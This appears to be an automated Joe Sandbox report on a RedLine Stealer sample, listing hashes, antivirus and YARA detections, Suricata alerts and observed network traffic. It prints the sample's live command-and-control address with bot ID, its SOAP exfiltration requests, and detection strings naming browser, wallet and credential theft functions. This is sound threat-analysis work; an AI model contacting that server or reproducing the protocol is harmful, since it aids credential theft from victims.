Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VXB84UvyHp.exe

Overview

General Information

Sample name:VXB84UvyHp.exe
renamed because original name is a hash value
Original sample name:4698A45D6F8DA200C396E56AF7B8D34F.exe
Analysis ID:1596524
MD5:4698a45d6f8da200c396e56af7b8d34f
SHA1:6df61371dbfd7d9245bb1e6bc63cb253bcb010a4
SHA256:fd17ba1c5a4ebe7ad43606505471a2357cb9a6bbdf11bde9a9c18633bfedd65d
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • VXB84UvyHp.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\VXB84UvyHp.exe" MD5: 4698A45D6F8DA200C396E56AF7B8D34F)
    • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["192.144.32.84:16383"], "Bot Id": "nazzze"}
SourceRuleDescriptionAuthorStrings
VXB84UvyHp.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    VXB84UvyHp.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      VXB84UvyHp.exeWindows_Trojan_RedLineStealer_f54632ebunknownunknown
      • 0x135ca:$a4: get_ScannedWallets
      • 0x12428:$a5: get_ScanTelegram
      • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
      • 0x1106a:$a7: <Processes>k__BackingField
      • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
      • 0x1099e:$a9: <ScanFTP>k__BackingField
      VXB84UvyHp.exeinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
      • 0x119cb:$gen01: ChromeGetRoamingName
      • 0x119ff:$gen02: ChromeGetLocalName
      • 0x11a28:$gen03: get_UserDomainName
      • 0x13c67:$gen04: get_encrypted_key
      • 0x131e3:$gen05: browserPaths
      • 0x1352b:$gen06: GetBrowsers
      • 0x12e61:$gen07: get_InstalledInputLanguages
      • 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
      • 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
      • 0x9118:$spe6: windows-1251, CommandLine:
      • 0x143bf:$spe9: *wallet*
      • 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20
      • 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
      • 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042
      • 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
      • 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63
      • 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
      • 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
      • 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
      • 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2
      • 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
      VXB84UvyHp.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
      • 0x1048a:$u7: RunPE
      • 0x13b41:$u8: DownloadAndEx
      • 0x9130:$pat14: , CommandLine:
      • 0x13079:$v2_1: ListOfProcesses
      • 0x1068b:$v2_2: get_ScanVPN
      • 0x1072e:$v2_2: get_ScanFTP
      • 0x1141e:$v2_2: get_ScanDiscord
      • 0x1240c:$v2_2: get_ScanSteam
      • 0x12428:$v2_2: get_ScanTelegram
      • 0x124ce:$v2_2: get_ScanScreen
      • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
      • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
      • 0x13509:$v2_2: get_ScanBrowsers
      • 0x135ca:$v2_2: get_ScannedWallets
      • 0x135f0:$v2_2: get_ScanWallets
      • 0x13610:$v2_3: GetArguments
      • 0x11cd9:$v2_4: VerifyUpdate
      • 0x165ee:$v2_4: VerifyUpdate
      • 0x139ca:$v2_5: VerifyScanRequest
      • 0x130c6:$v2_6: GetUpdates
      • 0x165cf:$v2_6: GetUpdates
      SourceRuleDescriptionAuthorStrings
      dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
        dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000000.1688057182.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000000.1688057182.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000000.00000000.1688057182.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
              • 0x133ca:$a4: get_ScannedWallets
              • 0x12228:$a5: get_ScanTelegram
              • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
              • 0x10e6a:$a7: <Processes>k__BackingField
              • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
              • 0x1079e:$a9: <ScanFTP>k__BackingField
              Process Memory Space: VXB84UvyHp.exe PID: 7296JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Process Memory Space: VXB84UvyHp.exe PID: 7296JoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  Click to see the 1 entries
                  SourceRuleDescriptionAuthorStrings
                  0.0.VXB84UvyHp.exe.ab0000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.0.VXB84UvyHp.exe.ab0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      0.0.VXB84UvyHp.exe.ab0000.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                      • 0x135ca:$a4: get_ScannedWallets
                      • 0x12428:$a5: get_ScanTelegram
                      • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
                      • 0x1106a:$a7: <Processes>k__BackingField
                      • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                      • 0x1099e:$a9: <ScanFTP>k__BackingField
                      0.0.VXB84UvyHp.exe.ab0000.0.unpackinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
                      • 0x119cb:$gen01: ChromeGetRoamingName
                      • 0x119ff:$gen02: ChromeGetLocalName
                      • 0x11a28:$gen03: get_UserDomainName
                      • 0x13c67:$gen04: get_encrypted_key
                      • 0x131e3:$gen05: browserPaths
                      • 0x1352b:$gen06: GetBrowsers
                      • 0x12e61:$gen07: get_InstalledInputLanguages
                      • 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
                      • 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
                      • 0x9118:$spe6: windows-1251, CommandLine:
                      • 0x143bf:$spe9: *wallet*
                      • 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20
                      • 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
                      • 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042
                      • 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
                      • 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63
                      • 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
                      • 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
                      • 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
                      • 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2
                      • 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
                      0.0.VXB84UvyHp.exe.ab0000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                      • 0x1048a:$u7: RunPE
                      • 0x13b41:$u8: DownloadAndEx
                      • 0x9130:$pat14: , CommandLine:
                      • 0x13079:$v2_1: ListOfProcesses
                      • 0x1068b:$v2_2: get_ScanVPN
                      • 0x1072e:$v2_2: get_ScanFTP
                      • 0x1141e:$v2_2: get_ScanDiscord
                      • 0x1240c:$v2_2: get_ScanSteam
                      • 0x12428:$v2_2: get_ScanTelegram
                      • 0x124ce:$v2_2: get_ScanScreen
                      • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                      • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                      • 0x13509:$v2_2: get_ScanBrowsers
                      • 0x135ca:$v2_2: get_ScannedWallets
                      • 0x135f0:$v2_2: get_ScanWallets
                      • 0x13610:$v2_3: GetArguments
                      • 0x11cd9:$v2_4: VerifyUpdate
                      • 0x165ee:$v2_4: VerifyUpdate
                      • 0x139ca:$v2_5: VerifyScanRequest
                      • 0x130c6:$v2_6: GetUpdates
                      • 0x165cf:$v2_6: GetUpdates
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-22T04:12:06.906621+010020450001Malware Command and Control Activity Detected192.144.32.8416383192.168.2.449731TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-22T04:12:09.938040+010020450011Malware Command and Control Activity Detected192.144.32.8416383192.168.2.449731TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-22T04:12:01.807485+010028496621Malware Command and Control Activity Detected192.168.2.449731192.144.32.8416383TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-22T04:12:07.076107+010028493511Malware Command and Control Activity Detected192.168.2.449731192.144.32.8416383TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-22T04:12:11.531627+010028482001Malware Command and Control Activity Detected192.168.2.449734192.144.32.8416383TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-22T04:12:10.308600+010028493521Malware Command and Control Activity Detected192.168.2.449733192.144.32.8416383TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-22T04:12:01.807485+010018000001Malware Command and Control Activity Detected192.168.2.449731192.144.32.8416383TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: VXB84UvyHp.exeAvira: detected
                      Source: VXB84UvyHp.exeMalware Configuration Extractor: RedLine {"C2 url": ["192.144.32.84:16383"], "Bot Id": "nazzze"}
                      Source: VXB84UvyHp.exeVirustotal: Detection: 83%Perma Link
                      Source: VXB84UvyHp.exeReversingLabs: Detection: 95%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: VXB84UvyHp.exeJoe Sandbox ML: detected
                      Source: VXB84UvyHp.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 172.67.75.172:443 -> 192.168.2.4:49732 version: TLS 1.0
                      Source: VXB84UvyHp.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49731 -> 192.144.32.84:16383
                      Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49731 -> 192.144.32.84:16383
                      Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49734 -> 192.144.32.84:16383
                      Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49733 -> 192.144.32.84:16383
                      Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 192.144.32.84:16383 -> 192.168.2.4:49731
                      Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49731 -> 192.144.32.84:16383
                      Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 192.144.32.84:16383 -> 192.168.2.4:49731
                      Source: Malware configuration extractorURLs: 192.144.32.84:16383
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 16383
                      Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 16383
                      Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 16383
                      Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 16383
                      Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49734
                      Source: global trafficTCP traffic: 192.168.2.4:54795 -> 162.159.36.2:53
                      Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 192.144.32.84:16383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 192.144.32.84:16383Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 192.144.32.84:16383Content-Length: 927088Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 192.144.32.84:16383Content-Length: 927080Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 172.67.75.172 172.67.75.172
                      Source: Joe Sandbox ViewASN Name: MATTEOGB MATTEOGB
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: unknownHTTPS traffic detected: 172.67.75.172:443 -> 192.168.2.4:49732 version: TLS 1.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.144.32.84
                      Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 192.144.32.84:16383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000003036000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.144.32.84:16383
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.144.32.84:16383/
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000003036000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1813975297.000000000303A000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                      Source: VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                      Source: VXB84UvyHp.exeString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                      Source: VXB84UvyHp.exeString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                      Source: VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
